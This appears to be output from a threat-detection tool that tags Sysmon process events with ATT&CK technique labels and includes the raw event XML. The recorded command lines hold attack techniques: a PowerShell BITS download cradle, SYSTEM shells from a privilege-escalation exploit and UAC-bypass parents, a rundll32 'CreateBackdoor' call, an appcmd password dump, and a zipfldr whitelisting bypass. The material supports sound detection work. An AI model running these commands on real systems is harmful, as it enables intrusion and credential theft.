<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:03.966393Z"">
</TimeCreated>
<EventRecordID>4895</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:03.695</Data>
<Data Name=""ProcessGuid"">747F3D96-660F-5D3F-0000-00106B508600</Data>
<Data Name=""ProcessId"">6720</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-660F-5D3F-0000-001055378600</Data>
<Data Name=""ParentProcessId"">2948</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;c:\Windows\System32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-05-07T13:13:02.481447Z"">
</TimeCreated>
<EventRecordID>112815</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2888"" ThreadID=""3384"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-05-07 13:13:02.476</Data>
<Data Name=""ProcessGuid"">747F3D96-095E-5EB4-0000-0010D46F1800</Data>
<Data Name=""ProcessId"">5216</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;c:\Windows\System32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-08F7-5EB4-0000-0020BAEC0200</Data>
<Data Name=""LogonId"">0x2ecba</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-095E-5EB4-0000-001002511800</Data>
<Data Name=""ParentProcessId"">6396</Data>
<Data Name=""ParentImage"">C:\Windows\System32\changepk.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\ChangePk.exe&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1564435984.008882,2019-07-30T01:33:04.008882+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:03.966393Z"">
</TimeCreated>
<EventRecordID>4895</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:03.695</Data>
<Data Name=""ProcessGuid"">747F3D96-660F-5D3F-0000-00106B508600</Data>
<Data Name=""ProcessId"">6720</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-660F-5D3F-0000-001055378600</Data>
<Data Name=""ParentProcessId"">2948</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564913810.45591,2019-08-04T14:16:50.455910+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c start C:\Windows\system32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-04T10:16:50.009124Z"">
</TimeCreated>
<EventRecordID>5950</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-04 10:16:49.960</Data>
<Data Name=""ProcessGuid"">747F3D96-B091-5D46-0000-001081F71104</Data>
<Data Name=""ProcessId"">820</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c start C:\Windows\system32\cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
<Data Name=""LogonId"">0x18d3b3</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-B080-5D46-0000-0010D4EA0F04</Data>
<Data Name=""ParentProcessId"">2112</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WSReset.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\WSReset.exe&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1595802375.141764,2020-07-27T02:26:15.141764+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-07-26T22:26:14.523075Z"">
</TimeCreated>
<EventRecordID>339222</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3332"" ThreadID=""4376"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-07-26 22:26:14.521</Data>
<Data Name=""ProcessGuid"">747F3D96-0306-5F1E-0000-0010E15F3100</Data>
<Data Name=""ProcessId"">3660</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-F938-5F1D-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-F938-5F1D-0000-00104B500000</Data>
<Data Name=""ParentProcessId"">584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\winlogon.exe</Data>
<Data Name=""ParentCommandLine"">winlogon.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920560.555423,2019-05-27T05:29:20.555423+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;. )&quot; /text:password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:20.555423Z"">
</TimeCreated>
<EventRecordID>5991</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:20.475</Data>
<Data Name=""ProcessGuid"">365ABB72-3D70-5CEB-0000-0010F2EDFF00</Data>
<Data Name=""ProcessId"">4012</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;. )&quot; /text:password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564834103.555174,2019-08-03T16:08:23.555174+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-03T12:08:23.554778Z"">
</TimeCreated>
<EventRecordID>5452</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-03 12:08:23.391</Data>
<Data Name=""ProcessGuid"">747F3D96-7937-5D45-0000-00100D290801</Data>
<Data Name=""ProcessId"">4192</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-D4E9-5D45-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-7934-5D45-0000-0010CAB90701</Data>
<Data Name=""ParentProcessId"">7564</Data>
<Data Name=""ParentImage"">C:\Windows\System32\consent.exe</Data>
<Data Name=""ParentCommandLine"">consent.exe 896 272 00000280644BC500</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1589069378.023663,2020-05-10T04:09:38.023663+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-05-10T00:09:36.709454Z"">
</TimeCreated>
<EventRecordID>112969</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2728"" ThreadID=""3432"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-05-10 00:09:36.703</Data>
<Data Name=""ProcessGuid"">747F3D96-4640-5EB7-0000-0010EF364B01</Data>
<Data Name=""ProcessId"">372</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">c:\Windows\System32\cmd.exe</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Tools\PrivEsc\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-3B92-5EB5-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-4640-5EB7-0000-0010292D4B01</Data>
<Data Name=""ParentProcessId"">8028</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe</Data>
<Data Name=""ParentCommandLine"">NetworkServiceExploit.exe -i -c &quot;c:\Windows\System32\cmd.exe&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766817.998461,2020-03-21T09:00:17.998461+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:17.997235Z"">
</TimeCreated>
<EventRecordID>243516</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.518</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-00109B6C1E00</Data>
<Data Name=""ProcessId"">6620</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766817.998461,2020-03-21T09:00:17.998461+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:17.997235Z"">
</TimeCreated>
<EventRecordID>243516</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.518</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-00109B6C1E00</Data>
<Data Name=""ProcessId"">6620</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( &quot;C:\Windows\System32\rundll32.exe&quot; zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:58:54.897009Z"">
</TimeCreated>
<EventRecordID>16443</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2036"" ThreadID=""296"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:58:54.772</Data>
<Data Name=""ProcessGuid"">365ABB72-269E-5CD8-0000-001084F81A00</Data>
<Data Name=""ProcessId"">2728</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
